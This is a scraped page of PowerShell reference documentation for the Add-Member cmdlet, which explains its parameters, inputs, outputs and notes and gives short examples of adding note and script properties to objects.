$Asset | Add-Member -NotePropertyMembers $d -TypeName Asset
$Asset | Get-Member

   TypeName: Asset

Name        MemberType   Definition
----        ----------   ----------
Equals      Method       bool Equals(System.Object obj)
GetHashCode Method       int GetHashCode()
GetType     Method       type GetType()
ToString    Method       string ToString()
Name        NoteProperty System.String Name=Server30
PSVersion   NoteProperty System.String PSVersion=4.0
System      NoteProperty System.String System=Server Core
Parameters
Indicates that this cmdlet adds a new member even if the object has a custom member with the same name. You cannot use the Force parameter to replace a standard member of a type.
Specifies the object to which the new member is added. Enter a variable that contains the objects, or type a command or expression that gets the objects.
Specifies the type of the member to add. This parameter is required. The acceptable values for this parameter are:
- NoteProperty
- AliasProperty
- ScriptProperty
- CodeProperty
- ScriptMethod
- CodeMethod
For information about these values, see PSMemberTypes Enumeration in the MSDN library.
Not all objects have every type of member. If you specify a member type that the object does not have, PowerShell returns an error.
Specifies the name of the member that this cmdlet adds.
Specifies a hash table or ordered dictionary of note property names and values. Type a hash table or dictionary in which the keys are note property names and the values are note property values.
For more information about hash tables and ordered dictionaries in PowerShell, see about_Hash_Tables.
This parameter was introduced in Windows PowerShell 3.0.
Specifies the note property name.
Use this parameter with the NotePropertyValue parameter. This parameter is optional.
This parameter was introduced in Windows PowerShell 3.0.
Specifies the note property value.
Use this parameter with the NotePropertyName parameter. This parameter is optional.
This parameter was introduced in Windows PowerShell 3.0.
Returns an object representing the item with which you are working. By default, this cmdlet does not generate any output.
For most objects,
Add-Member adds the new members to the input object.
However, when the input object is a string,
Add-Member cannot add the member to the input object.
For these objects, use the PassThru parameter to create an output object.
In Windows PowerShell 2.0,
Add-Member added members only to the PSObject wrapper of objects,
not to the object.
Use the PassThru parameter to create an output object for any object that has a PSObject
wrapper.
Specifies optional additional information about AliasProperty, ScriptProperty, CodeProperty, or CodeMethod members.
If used when adding an AliasProperty, this parameter must be a data type; a conversion to the specified data type is added to the value of the AliasProperty. If used when adding a ScriptProperty, the first ScriptBlock, specified in the Value parameter, is used to get the value of the property, and the second ScriptBlock, specified in the SecondValue parameter, is used to set the value of the property.
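As a sketch (the property name Label and the backing _label note property are made up for illustration), adding a ScriptProperty with both a getter and a setter could look like this:

$obj = New-Object -TypeName PSObject
$obj | Add-Member -MemberType NoteProperty -Name _label -Value "initial"
$obj | Add-Member -MemberType ScriptProperty -Name Label `
    -Value { $this._label } `
    -SecondValue { param($value) $this._label = $value }
$obj.Label          # returns "initial"
$obj.Label = "new"  # invokes the setter ScriptBlock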
Specifies a name for the type.
When the type is a class in the System namespace or a type that has a type accelerator, you can enter the short name of the type. Otherwise, the full type name is required. This parameter is effective only when the InputObject is a PSObject.
This parameter was introduced in Windows PowerShell 3.0.
Specifies the initial value of the added member. If you add an AliasProperty, CodeProperty, ScriptProperty or CodeMethod member, you can supply optional, additional information by using the SecondValue parameter.
Inputs
System.Management.Automation.PSObject
You can pipe any object type to this cmdlet.
Outputs
None or System.Object
When you use the PassThru parameter, this cmdlet returns the newly-extended object. Otherwise, this cmdlet does not generate any output.
Notes
You can add members only to PSObject objects. To determine whether an object is a PSObject object, use the -is operator. For instance, to test an object stored in the $obj variable, type $obj -is [PSObject].
The names of the MemberType, Name, Value, and SecondValue parameters are optional. If you omit the parameter names, the unnamed parameter values must appear in this order: MemberType, Name, Value, and SecondValue.
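For instance, a positional sketch equivalent to naming the parameters (the property name and value are arbitrary, and $Asset is the object from the example above):

# Same as: $Asset | Add-Member -MemberType NoteProperty -Name Status -Value 'Online'
$Asset | Add-Member NoteProperty Status 'Online'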
|
https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Utility/Add-Member?view=powershell-4.0
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
Applies force at position. As a result this will apply a torque and force on the object. For realistic effects position should be approximately in the range of the surface of the rigidbody.
This is most commonly used for explosions. When applying explosions it is best to apply forces over several frames instead of just one.
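A rough sketch of spreading an explosion over several physics steps (the force magnitude, frame count, and class name are illustrative assumptions, not part of the Unity API):

using System.Collections;
using UnityEngine;

public class ExplosionOverFrames : MonoBehaviour
{
    public float totalForce = 300f;   // hypothetical tuning value
    public int frames = 5;            // hypothetical tuning value

    public IEnumerator ApplyExplosion(Rigidbody body, Vector3 explosionOrigin)
    {
        Vector3 direction = (body.worldCenterOfMass - explosionOrigin).normalized;
        float forcePerFrame = totalForce / frames;
        for (int i = 0; i < frames; i++)
        {
            // Apply a fraction of the total force each physics step at the explosion origin.
            body.AddForceAtPosition(direction * forcePerFrame, explosionOrigin);
            yield return new WaitForFixedUpdate();
        }
    }
}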
Note that when position is far away from the center of the rigidbody the applied torque will be unrealistically large.
Force can be applied only to an active rigidbody. If a GameObject is inactive, AddForceAtPosition has no effect.
Wakes up the Rigidbody by default. If the force size is zero then the Rigidbody will not be woken up.
See Also: AddForce, AddRelativeForce, AddTorque.
using UnityEngine;
using System.Collections;

public class ExampleClass : MonoBehaviour
{
    void ApplyForce(Rigidbody body)
    {
        Vector3 direction = body.transform.position - transform.position;
        body.AddForceAtPosition(direction.normalized, transform.position);
    }
}
|
https://docs.unity3d.com/kr/2017.3/ScriptReference/Rigidbody.AddForceAtPosition.html
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
iofunc_ocb_calloc()
Allocate an iofunc Open Control Block
Synopsis:
#include <sys/iofunc.h>

iofunc_ocb_t * iofunc_ocb_calloc( resmgr_context_t * ctp,
                                  iofunc_attr_t * attr );
Arguments:
- ctp
- A pointer to a resmgr_context_t structure that the resource-manager library uses to pass context information between functions.
- attr
- A pointer to a iofunc_attr_t structure that defines the characteristics of the device that the resource manager handles.
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The iofunc_ocb_calloc() function allocates an iofunc OCB. It has a number of uses:
- It can be used as a helper function to encapsulate the allocation of the iofunc OCB, so that your routines don't have to know the details of the iofunc OCB structure.
- Because it's in the resource manager shared library, you can override this function with your own, allowing you to manage an OCB that has additional members, perhaps specific to your particular resource manager. If you do this, be sure to place the iofunc OCB structure as the first element of your extended OCB, and also override the iofunc_ocb_free() function to release memory.
- Another reason to override iofunc_ocb_calloc() might be to place limits on the number of OCBs that are in existence at any one time; the current function simply allocates OCBs until the free store is exhausted.
You should fill in the attribute's mount structure (i.e. the attr->mount pointer) instead of replacing this function.
If you specify iofunc_ocb_calloc() and iofunc_ocb_free() callouts in the attribute's mount structure, then you should use the callouts instead of calling the standard iofunc_ocb_calloc() and iofunc_ocb_free() functions.
Returns:
A pointer to an iofunc_ocb_t OCB structure.
Examples:
Override iofunc_ocb_calloc() and iofunc_ocb_free() to manage an extended OCB:
typedef struct {
    iofunc_ocb_t iofuncOCB;   /* the OCB used by iofunc_* */
    int myFlags;
    char moreOfMyStuff;
} MyOCBT;

MyOCBT *iofunc_ocb_calloc (resmgr_context_t *ctp, iofunc_attr_t *attr)
{
    return ((MyOCBT *) calloc (1, sizeof (MyOCBT)));
}

void iofunc_ocb_free (MyOCBT *ocb)
{
    free (ocb);
}
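Building on the idea above of capping the number of OCBs, here is a rough sketch; the limit, counter, and function names are invented for illustration, and these callouts would be wired up through the attribute's mount structure as recommended earlier:

#include <stdlib.h>
#include <sys/iofunc.h>

/* Illustrative limit; not part of the QNX API. */
#define MAX_OCBS 64

static int ocb_count;

iofunc_ocb_t *my_ocb_calloc (resmgr_context_t *ctp, iofunc_attr_t *attr)
{
    iofunc_ocb_t *ocb;

    if (ocb_count >= MAX_OCBS) {
        return NULL;            /* refuse the allocation once the cap is reached */
    }
    ocb = calloc (1, sizeof (*ocb));
    if (ocb != NULL) {
        ocb_count++;
    }
    return ocb;
}

void my_ocb_free (iofunc_ocb_t *ocb)
{
    free (ocb);
    ocb_count--;
}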
|
http://developer.blackberry.com/playbook/native/reference/com.qnx.doc.neutrino.lib_ref/topic/i/iofunc_ocb_calloc.html
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
public class ConstantSpeculativeExecutionPolicy extends Object implements SpeculativeExecutionPolicy
A SpeculativeExecutionPolicy that schedules a given number of speculative executions, separated by a fixed delay.
SpeculativeExecutionPolicy.SpeculativeExecutionPlan
clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait
public ConstantSpeculativeExecutionPolicy(long constantDelayMillis, int maxSpeculativeExecutions)
constantDelayMillis - the delay between each speculative execution. Must be strictly positive.
maxSpeculativeExecutions - the number of speculative executions. Must be strictly positive.
IllegalArgumentException - if one of the arguments does not respect the preconditions above.
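A minimal usage sketch with the driver's Cluster builder (the contact point, delay, and execution count are placeholder values):

import com.datastax.driver.core.Cluster;
import com.datastax.driver.core.policies.ConstantSpeculativeExecutionPolicy;

public class SpeculativeExecutionExample {
    public static void main(String[] args) {
        Cluster cluster = Cluster.builder()
                .addContactPoint("127.0.0.1")          // placeholder contact point
                .withSpeculativeExecutionPolicy(
                        new ConstantSpeculativeExecutionPolicy(
                                500,                   // delay between speculative executions (ms)
                                2))                    // maximum number of speculative executions
                .build();
        // ... use the cluster, then release its resources
        cluster.close();
    }
}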
public SpeculativeExecutionPolicy.SpeculativeExecutionPlan newPlan(String loggedKeyspace, Statement statement)
newPlan in interface SpeculativeExecutionPolicy
public void init(Cluster cluster)
init in interface SpeculativeExecutionPolicy
cluster - the cluster that this policy is associated with.
public void close()
close in interface SpeculativeExecutionPolicy
|
https://docs.datastax.com/en/drivers/java/2.1/com/datastax/driver/core/policies/ConstantSpeculativeExecutionPolicy.html
|
CC-MAIN-2019-26
|
en
|
refinedweb
|